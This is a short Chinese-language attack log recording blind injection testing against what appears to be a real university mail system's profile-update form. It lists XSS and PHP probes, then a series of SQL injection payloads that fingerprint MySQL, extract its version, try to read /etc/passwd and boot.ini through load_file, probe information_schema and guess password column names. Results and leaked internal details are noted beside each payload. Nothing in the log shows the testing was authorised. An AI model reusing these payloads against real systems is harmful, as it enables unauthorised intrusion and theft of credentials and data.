首先,盲测,依次输入
><script>alert("ok!");</script
><? phpinfo(); ?
")"/\
得到的信息:
1.从>之后的信息被放到</input>标签之后
2.sql语句为:UPDATE user SET name='$post' where id =xxxxxx@mails.jlu.edu.cn'
3.php语句会被注释为 <!--? phpinfo(); ?-->
以下是测试记录:
1.summer1' where name="3" and exists(select * from dual) # #'
2.summer2',name=@ver where name="summer22" and (select @ver:=substring('2011-11-17',1)) # #'
证明是mysql
3.summer2',name=@ver where name="summer1" and (select @ver:=version()) # #'
达到版本号4.1.20
4.summer2',name=@ver where name="4.1.20" and (select @ver:=DATABASE() ) # #'
执行失败
summer2',name=@ver where name="4.1.20" and (select @ver:=user() ) # #'
执行失败
5.summer2',name=@ver where name="4.1.20" and (select @ver:=load_file("/etc/passwd") ) # #'
执行失败
summer2',name=@ver where name="4.1.20" and (select @ver:=load_file("c:\\boot.ini") ) # #'
执行失败
6.summer1' where name="summer2" and EXISTS(SELECT column_name from information_schema.columns) # #'
err:Access denied for user 'mail'@'10.100.108.4' to database 'information_schema'
7.summer1' where passwd="new234567" # #'
不存在字段password,passwd,pw,id,uid,email,mail,email_id
